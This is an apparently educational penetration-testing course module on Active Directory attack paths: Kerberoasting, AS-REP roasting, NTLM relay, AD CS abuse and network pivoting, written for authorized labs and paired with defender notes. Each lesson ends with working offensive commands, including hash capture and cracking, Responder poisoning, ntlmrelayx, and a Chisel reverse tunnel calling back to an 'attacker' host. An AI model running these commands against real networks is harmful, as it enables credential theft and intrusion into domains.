Module 07 · Advanced
Internal Networks & Active Directory
Windows estates, Active Directory attack paths, NTLM, Kerberos, BloodHound, relays, and intentional pivoting — taught exclusively for lab use and authorized engagements. Build GOAD or similar before applying techniques on client networks.
Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.
Outcomes
- Enumerate Active Directory with a clear mental model and kill chain
- Use Impacket, NetExec/CrackMapExec, and BloodHound effectively in labs
- Explain Kerberoasting, AS-REP roasting, and NTLM relay concepts with defenses
- Pivot intentionally with SSH, Chisel, Ligolo-ng, and proxychains
- Narrate identity-based attack paths without unnecessary domain destruction
Lessons
Active Directory mental model
Domains, forests, trusts, SPNs, ACLs, and identity as the perimeter. Learn what BloodHound collects and how to read graphs for privilege paths — so tools amplify understanding instead of replacing it. Practice only in authorized AD labs (GOAD, DetectionLab, HTB Academy, or client-scoped internal tests).
Learning objectives
- Describe core AD objects, authentication flows (Kerberos/NTLM), and trust concepts
- Explain what data BloodHound needs and why graph edges become attack paths
- Prioritize identity findings over random host vulnerabilities on internal tests
- Enumerate domain users, groups, computers, and shares with disciplined tooling
- Build a lab AD baseline before attempting multi-technique chains
Deep teach-through
Identity is the modern internal perimeter
Once an attacker or tester has a single domain foothold — a phished laptop, a misconfigured web shell on a domain-joined host, a sprayed user VPN — the security story becomes identity: who trusts whom, who can admin what, which ACLs are overgrown, and where credentials reuse collapses isolation. Firewalls still matter for segmentation, but many 'flat' networks make every workstation a potential path to Domain Admin.
Active Directory centralizes authentication and authorization for users, computers, groups, GPOs, and service identities. Misconfigurations accumulate for years: nested groups nobody maps, ACLs granted for temporary projects, service accounts with SPNs and weak passwords, unconstrained delegation left 'for the app to work.' Your job is structured enumeration and path analysis under authorization — not random exploitation of every CVE on every host.
Always frame techniques as authorized simulation. Production AD tests need clear RoE for password sprays, coercive authentication, DCSync-style actions, and intentional lockouts. Prefer read-oriented enumeration first; escalate impact only as objectives require.
Objects, auth flows, and tickets at a glance
Users, computers, groups, OUs, GPOs, and security principals form the directory. Authentication commonly uses Kerberos (tickets, SPNs, TGT/TGS) inside the domain and NTLM as legacy fallback. Understanding when each appears helps interpret Responder poison results, relay opportunities, and why disabling NTLM is a long journey for defenders.
A TGT proves the user to the KDC; a TGS lets the user authenticate to a service identified by SPN. Service accounts with SPNs and crackable passwords enable Kerberoasting. Accounts without pre-authentication enable AS-REP roasting. You will practice these in the next lesson — here, memorize the dependency graph so attacks are not magic scripts.
Trusts between domains/forests expand the graph. A path that stops at DA in a child domain may still matter if abuse of trust relationships is in scope. Do not assume forest root is always the crown jewel; sometimes a single tier-0 asset or cloud-synced identity is the real objective.
Local admin reuse and the death of segmentation
Local Administrator Password Solution (LAPS) and unique local admin secrets exist because shared local admin passwords turn one workstation compromise into a horizontal worm. Credential dumping concepts (taught carefully in post-ex modules) combine with admin reuse to detonate domains. Even without malware, administrative SMB/WinRM across the estate is enough.
When enumerating, note who has local admin on which hosts (BloodHound local admin edges, group membership, GPO restricted groups). Those edges often beat exotic ACEs for practical paths. Prioritize high-value servers and jump hosts in your mental model.
Tiering models (tier 0/1/2) are defender architecture; as a tester you measure whether the tiering is real or paper. Admins browsing the web on tier-0 identities is a finding in narrative form even before a technical exploit.
BloodHound as a reasoning tool
BloodHound (and collectors like SharpHound/RustHound) ingest relationships: group membership, sessions, ACLs, local admin, RDP rights, trusts, and more. The graph answers 'from principal A, what can I reach?' Shortest path to Domain Admins is a starting visualization, not the only interesting query. Custom queries for high-value targets, kerberoastable users, and dangerous ACEs build real skill.
Collection itself can be noisy. Agree on collection method and timing. Avoid treating graph edges as automatically exploitable without validating prerequisites (network path, auth protocol, defensive controls). False paths exist; verify in the lab before claiming domain compromise.
Learn to read why an edge exists: GenericAll on a user, ForceChangePassword, DCSync rights, WriteDacl on a group. The edge name is a clue to the abuse technique and to the remediation (remove ACL, fix nesting, enable PAW, etc.).
Enumeration order that scales
From a domain-joined foothold or valid creds: identify domain/forest, DCs, your privileges, interesting groups, policy hints (password, lockout), SPN-bearing accounts, shares, and sessions if available. Impacket examples, ldapsearch, NetExec/CrackMapExec, enum4linux-style SMB enum, and BloodHound collection each cover layers.
Stay organized: host lists, credential inventory (who works where), and path hypotheses in notes. Internal tests generate data fast; without structure you re-enumerate endlessly. Mark each technique with detection expectation for purple-friendly reporting.
Build GOAD, DetectionLab, or a small manual AD lab before client work. Muscle memory for safe syntax belongs on disposable domains where DC restore is a snapshot away.
Prioritizing identity findings
A critical identity path (low-priv user to DA via ACL abuse) often outweighs a medium CVE on a print server. Rank by privilege gain, likelihood, and required conditions. Report paths as narratives: start principal, edges, end principal, proof performed, residual risk if you stopped short of full DA.
Clients need remediation that is operational: remove dangerous ACLs, implement LAPS, disable legacy protocols, constrain delegation, tighten service account rights, monitor for BloodHound-like LDAP collection and anomalous Kerberos requests. Map recommendations to the edges you abused.
Never 'own the domain for fun' beyond objectives. Proportional proof might be DCSync rights demonstration or a single sensitive file read — not ransomware simulation.
Key concepts
- Security principal
- AD identity (user, computer, group, etc.) that can be authenticated and authorized.
- SPN
- Service Principal Name: Kerberos identifier for a service instance, central to Kerberoasting.
- Attack path
- Sequence of abusable relationships from a starting principal to a high-value objective.
- Tier-0
- Assets and identities whose compromise controls the enterprise identity plane (DCs, DA, PKI, etc.).
- BloodHound edge
- Graph relationship representing a control or access possibility between principals or systems.
Common mistakes
- Running BloodHound and declaring DA without validating the path live
- Treating every internal host equally instead of identity-path prioritization
- Practicing destructive AD techniques first on production domains
- Ignoring local admin reuse while chasing exotic ACL chains
- Collecting graph data outside agreed noise and scope windows
Defender view
- Tiered administration, LAPS, and cleaned ACLs collapse most shortest paths.
- LDAP and Kerberos analytics detect many enumeration and roasting patterns.
- Graph-based defense (attack path management) mirrors offensive BloodHound reasoning.
Operator checklist
- I am operating only on authorized domains and hosts
- I can sketch Kerberos TGT/TGS purpose without notes
- Enumeration results are filed as inventory, creds, and path hypotheses
- BloodHound queries are tied to validated, not assumed, edges
- High-impact AD actions are justified by engagement objectives
Example commands & patterns
# Authorized AD lab only
crackmapexec smb 192.168.56.0/24 -u user -p 'LabPass1!' --shares
impacket-GetADUsers -all lab.local/user:LabPass1! -dc-ip 192.168.56.10
rusthound -d lab.local -u user@lab.local -p 'LabPass1!' -o bh-data --adcs
ldapsearch -x -H ldap://192.168.56.10 -D 'user@lab.local' -w 'LabPass1!' -b 'dc=lab,dc=local' '(objectClass=user)' sAMAccountName
Practice drills
- Deploy or use a guided AD lab (GOAD / HTB Academy / DetectionLab)
- Collect BloodHound data and identify one non-trivial path; write the edge list in prose
- Enumerate users, SPNs, and domain admins with at least two different tools; compare outputs
- Diagram domain, DCs, and your foothold host with trust boundaries
- List five identity findings you would prioritize over a missing OS patch on a workstation
Tools for this lesson
Next: Execute high-signal AD techniques in lab with detection and defense notes for each.
High-signal AD techniques
Kerberoasting, AS-REP roasting, NTLM relay, coercion, AD CS basics, and chaining into narratives — with OPSEC notes and defender countermeasures. Every hands-on step belongs in an authorized lab or explicitly scoped engagement; do not practice against production domains you do not own.
Learning objectives
- Execute core roasting and relay techniques in a lab with clear prerequisites
- State detection implications and primary defenses for each technique
- Chain techniques into a coherent path narrative rather than isolated demos
- Approach AD Certificate Services (ESC-class) issues at a working conceptual level
- Stop at proportional proof when engagement objectives are met
Deep teach-through
Roasting: Kerberoast and AS-REP
Kerberoasting requests service tickets for SPN-associated accounts and cracks them offline. Prerequisites: valid domain credentials (even low-priv), knowledge of SPNs, and offline cracking capability. Weak service account passwords remain common because 'the app breaks if we rotate.' In lab, use Impacket GetUserSPNs or Rubeus, then hashcat with the correct mode.
AS-REP roasting targets accounts with Kerberos pre-authentication disabled. No password needed for the request in classic form — only the ability to ask the KDC for AS-REP data for those users. Find candidates via LDAP attributes; crack offline. Fix is enabling pre-auth and strong passwords/MFA where applicable.
Report roasting as credential exposure risk with offline crack evidence for weak accounts. Do not crack and then reuse passwords widely beyond proof without scope. Prefer demonstrating one high-value service account recovery as impact.
NTLM relay and coercion classes
NTLM relay captures authentication attempts and forwards them to a target that accepts NTLM and lacks mitigations (SMB signing, EPA, channel binding as relevant). Responder can poison name resolution on local segments to induce auth; coercion tools trigger machine accounts to authenticate to attacker-controlled listeners when the network and OS conditions allow.
Successful relay to LDAP/LDAPS or HTTP endpoints can yield privilege changes or resource access depending on target and signing settings. impacket-ntlmrelayx is the classic lab workhorse. Modern EDR and hardening break many textbook relays — document both success and blocked attempts; blocked attempts still educate clients on control effectiveness.
These techniques are noisy and dangerous on production. Explicit RoE, change windows, and sometimes co-monitored purple exercises are appropriate. Never coerce authentication on networks outside scope.
AD Certificate Services (conceptual to practical)
AD CS issues certificates that can become credential equivalents. Misconfigured templates and enrollment rights create ESC-class abuse paths popularized in research and tooling (Certipy). Treat this as mandatory literacy for serious AD work: enumerate CA, templates, enrollment permissions, and dangerous EKUs.
In lab, practice finding a vulnerable template, enrolling, and using the cert for authentication — then reverse the changes. On engagements, certificate theft and persistent certs have high impact and high sensitivity; handle artifacts carefully and disclose quickly.
Defenses include template hardening, manager approval, restricted enrollment groups, monitoring for anomalous enrollment, and treating CAs as tier-0.
Credential abuse and lateral movement primitives
With valid creds, lateral movement uses SMB, WinRM, WMI, RDP, and MSSQL links as paths allow. Impacket wmiexec/smbexec/psexec-style tools and NetExec automate many patterns; each leaves different forensic footprints. Prefer least noisy method that still proves access for the report.
Mimikatz-class techniques and LSASS access teach why Credential Guard, LSA protection, and admin tiering matter — but dumping credentials is highly sensitive. Only under authorization, minimize scope, and never leave tooling behind. Many engagements accept proof via directory rights or file access without full OPSEC-heavy red-team malware.
Pass-the-hash, pass-the-ticket, and overpass-the-hash are identity reuse patterns. Understand them conceptually and practice in lab; on clients, use them only as needed for objectives and note detection likelihood.
Chaining into narratives
Isolated demos do not match attacker behavior. Example chain: sprayed user → Kerberoast service account → local admin on app server → read web.config → SQL SA → linked server → DA group via misconfig. Write the chain as a story with preconditions and places defenders could have interrupted it.
BloodHound paths should be validated step-by-step. If an edge fails (signing blocks relay, password not cracked), update the graph in your notes. Clients trust testers who show both successful and blocked paths.
Time-box: once DA or objective is proven, stop expanding chaos. Collect evidence, clean temporary objects you created (users, grants, shares) when policy requires, and transition to reporting.
OPSEC, EDR, and professional judgment
Many classic tools are signatured. Lab success may not equal stealthy enterprise success. For pure vulnerability assessment engagements, noisy proof is often acceptable if coordinated. For red-team style goals, tradecraft expectations differ — clarify engagement type.
Avoid techniques that risk domain-wide outages (bad password sprays at scale, reckless DC changes) unless explicitly scoped. Prefer reversible, documented changes. Snapshot-friendly labs build confidence before client execution.
Always pair each technique in your notes with: prerequisites, command/evidence, detection idea, remediation. That four-tuple is purple-team gold and improves report quality.
Key concepts
- Kerberoasting
- Requesting and offline-cracking Kerberos service tickets for SPN-enabled accounts.
- AS-REP roasting
- Offline cracking of AS-REP data for accounts that do not require Kerberos pre-authentication.
- NTLM relay
- Forwarding captured NTLM authentication to a target service to gain unauthorized access or rights.
- Coercion
- Forcing a host or account to authenticate to an attacker-controlled endpoint under abusable conditions.
- ESC (AD CS)
- Classes of Active Directory Certificate Services misconfigurations enabling privilege escalation via certificates.
Common mistakes
- Kerberoasting in production then cracking forever without reporting interim risk
- Relaying without checking signing/EPA and blaming 'broken tools' when controls work
- Leaving machine accounts, grants, or certs created mid-test uncleaned
- Equating lab OPSEC with EDR-heavy enterprise reality
- Skipping remediation mapping for each abused edge
Defender view
- SMB signing, LDAP signing/channel binding, and EPA break large relay classes.
- Strong service account passwords, gMSA, and pre-auth requirements blunt roasting.
- AD CS hardening and tier-0 protection of CAs prevent cert-based domain takeover.
Operator checklist
- Each technique's prerequisites were verified before execution
- RoE covers coercion, relay, roasting, and credential dumping as used
- Evidence includes minimal proof and cleanup status
- Detection and remediation notes exist per major technique
- Chains stop when objectives and proportional impact are satisfied
Example commands & patterns
# Authorized lab domain only
impacket-GetUserSPNs lab.local/user:LabPass1! -dc-ip 192.168.56.10 -request -outputfile roast.hashes
hashcat -m 13100 roast.hashes /usr/share/wordlists/rockyou.txt
impacket-GetNPUsers lab.local/ -usersfile users.txt -format hashcat -dc-ip 192.168.56.10
sudo responder -I eth1 -dwv
impacket-ntlmrelayx -t ldap://192.168.56.10 -smb2support
certipy find -u user@lab.local -p 'LabPass1!' -dc-ip 192.168.56.10 -vulnerable
Practice drills
- Perform Kerberoasting in a lab and crack a weak service password offline
- AS-REP roast a lab account configured without pre-auth; document the attribute fix
- Attempt an NTLM relay in lab with signing off, then repeat with signing on; compare outcomes
- Run Certipy find in lab and explain one vulnerable template in plain language
- Write a multi-step attack path narrative with a defense break at each hop
Tools for this lesson
Next: Learn pivoting so validated paths remain reachable across segmented lab networks.
Pivoting & tunneling
SSH local/remote/dynamic forwards, Chisel, Ligolo-ng, proxychains, and socat — moving through segmented labs like real internal networks. If you cannot pivot, you cannot simulate adversaries beyond the first subnet. Practice only on authorized lab topologies.
Learning objectives
- Build local, remote, and dynamic SSH forwards with clear diagrams
- Run scanners and exploit tools through SOCKS with proxychains
- Choose Chisel vs Ligolo-ng vs SSH based on foothold constraints
- Maintain orientation: which host, which tunnel, which target subnet
- Document pivot paths so teammates can reuse them during the engagement
Deep teach-through
Why pivoting is a core operator skill
Real networks segment OT, servers, workstations, and DMZs. Your initial shell is rarely on the same L3 network as the crown jewels. Pivoting is controlled use of a compromised host as a network hop — under authorization — to reach deeper subnets that routing from your attacker VM does not provide natively.
Without pivoting skills, AD paths that exist in BloodHound fail in practice because you cannot reach the host where the next edge executes. With pivoting, you simulate realistic attacker progression and produce findings about segmentation gaps.
Diagram constantly: attacker → foothold A → subnet B → target C. Label tunnel types and listening ports. Lost orientation is how operators scan the wrong interface or bounce traffic out of scope.
SSH forwards as the baseline
Local forward (-L): open a port on your machine that exits through the SSH server to a chosen target:port. Use for a single service (RDP, web admin, database) when you know the destination.
Remote forward (-R): open a port on the SSH server that connects back to a service on your side — useful for callbacks when the remote can SSH out to you. Dynamic forward (-D): SOCKS proxy on your side through the SSH host, ideal for exploratory access to a whole subnet with proxychains or browser proxying.
Prefer SSH when you have interactive credentials and sshd is available. It is auditable, simple, and often already allowed. Jump hosts (-J) and ProxyJump simplify multi-hop. Keep ControlMaster/ControlPath options in mind for stable sessions during long assessments.
Chisel and Ligolo-ng when SSH is not enough
When you only have code execution without SSH, or need reverse tunnels through egress-friendly ports, Chisel provides TCP/SOCKS tunnels over HTTP. Typical pattern: Chisel server on attacker, client on foothold connecting outbound, then SOCKS or port forwards into internal ranges.
Ligolo-ng creates a userland TUN interface experience that often feels cleaner than classical SOCKS for routing entire subnets. Learn both; choose based on lab constraints, binary availability, and whether you need layer-3 style routing vs per-tool proxy env vars.
Transfer of tunnel binaries must respect OPSEC and authorization. On engagements, use approved tooling paths; in labs, practice dropping, executing, and removing clients cleanly.
proxychains, tooling quirks, and scanning through pivots
proxychains forces TCP connections through SOCKS. Many tools work; some (raw SYN scans, UDP, ICMP) do not. Prefer TCP connect scans (nmap -sT) through SOCKS. Expect slowness; reduce parallelism; target focused ports first.
DNS through pivots is a common footgun: resolution may happen on the wrong side of the tunnel. Use /etc/hosts entries, tools' resolve options, or Ligolo-style routing carefully. Wrong DNS can send traffic to out-of-scope public IPs.
Test the pivot with a single curl or nmap to a known internal IP before launching wide scans. Confirm scope lists still apply on the far side of the tunnel.
Multi-hop and operational hygiene
Double-hop labs teach chain stability: attacker → DMZ web shell host → internal jump → AD subnet. Each hop adds latency and failure points. Automate reconnect notes; save working command lines in the engagement folder.
Do not create persistent tunnels that outlive the engagement without explicit permission. Tear down listeners, kill client processes, and verify ports closed during cleanup phases.
Coordinate with blue teams when tunnels will look like C2. Unexpected reverse HTTPS from servers may page on-call staff — good purple learning if planned, bad surprise if not.
Reporting segmentation findings
Pivots often produce findings such as: overly broad workstation-to-server routes, missing egress controls allowing tunnel C2-like channels, flat VLAN design, or jump host weaknesses. Frame impact as reduced effectiveness of segmentation controls.
Evidence includes diagrams, proof of reaching a sensitive service only via the pivot, and recommendations: stricter ACLs, identity-aware proxying, monitored PAWs, and blocking unnecessary east-west paths.
Tie back to AD: once pivoted into a server VLAN, re-run identity enumeration from the new position — paths may shorten.
Key concepts
- Local port forward
- Listener on the client side that relays through an SSH (or similar) host to a remote destination.
- Dynamic SOCKS forward
- Proxy port that relays arbitrary TCP destinations through the pivot host.
- Reverse tunnel
- Outbound connection from a restricted host that exposes internal reachability to the attacker side.
- Double-hop
- Chained pivots across two or more intermediate hosts to reach a deeper segment.
- Egress constraint
- Outbound filtering that dictates which tunnel protocols and ports can establish callbacks.
Common mistakes
- Losing track of which shell and tunnel points at which subnet
- Running SYN nmap through SOCKS and misinterpreting total failure
- DNS resolving on the attacker and sending traffic out of scope
- Leaving Chisel/Ligolo clients running after the engagement window
- Wide scanning through a fragile pivot until the foothold dies
Defender view
- Egress allowlisting and east-west microsegmentation shrink pivot options.
- Detecting new reverse tunnels and unusual SSH forwards is high-value monitoring.
- Jump hosts with strong MFA and session recording raise attacker cost.
Operator checklist
- A current network diagram includes every active tunnel
- Scope IPs on the far side are confirmed before scanning
- Tool choice matches foothold capabilities (SSH vs binary tunnel)
- Pivot connectivity verified with a single known-good probe first
- Teardown steps are listed for end-of-day cleanup
Example commands & patterns
# SSH dynamic SOCKS via lab jump host
ssh -D 9050 -N user@192.168.56.20
proxychains nmap -sT -Pn -n -p 445,3389,5985 10.10.20.0/24
# Chisel reverse SOCKS pattern (lab)
./chisel server -p 8000 --reverse
./chisel client attacker:8000 R:socks
# Ligolo-ng: follow current project docs for proxy/TUN setup in your lab version
Practice drills
- Create a double-hop lab and reach a hidden subnet service via pivot
- Run an Nmap TCP connect scan through proxychains and save filtered results
- Build the same reachability once with SSH -L and once with SOCKS; compare ergonomics
- Deploy Chisel or Ligolo-ng from a non-SSH foothold simulation and browse an internal web app
- Write a cleanup checklist and execute it; verify listeners are gone
Tools for this lesson
Next: With access on deeper hosts, apply privilege escalation methodology from Module 8.